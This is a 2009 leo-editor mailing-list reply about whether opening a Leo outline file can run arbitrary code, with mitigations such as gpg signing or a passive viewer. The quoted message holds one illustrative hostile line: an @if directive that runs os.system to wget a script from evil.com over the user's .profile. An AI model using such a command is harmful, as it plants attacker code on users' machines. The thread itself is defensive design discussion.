On Mon, Jul 6, 2009 at 10:25 PM, thyrsus<[email protected]> wrote:

> Before we implement this as documented, suppose I clicked on the
> attachment someone sent me (Hey!  It claimed it was from
> [email protected]!) containing a leo file with
>
> @settings
> �...@if exec('import os; os.system("wget -O $HOME/.profile
> http://www.evil.com/spam_the_world.sh";)')
>   �...@bool fubar=True

We also have {{ }} for evaluating paths that can execute arbitrary
code. I suppose there is no way to make a leo file "safe" - opening a
leo file could be considered equivalent to running a script on your
computer.

Signing leo docs with gpg could be a decent cop-out...

Or implementing a dumb "leo viewer" that parsed the sax, read in the
external files, and did nothing more.

-- 
Ville M. Vainio
http://tinyurl.com/vainio

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups 
"leo-editor" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to 
[email protected]
For more options, visit this group at 
http://groups.google.com/group/leo-editor?hl=en
-~----------~----~----~----~------~----~------~--~---

Reply via email to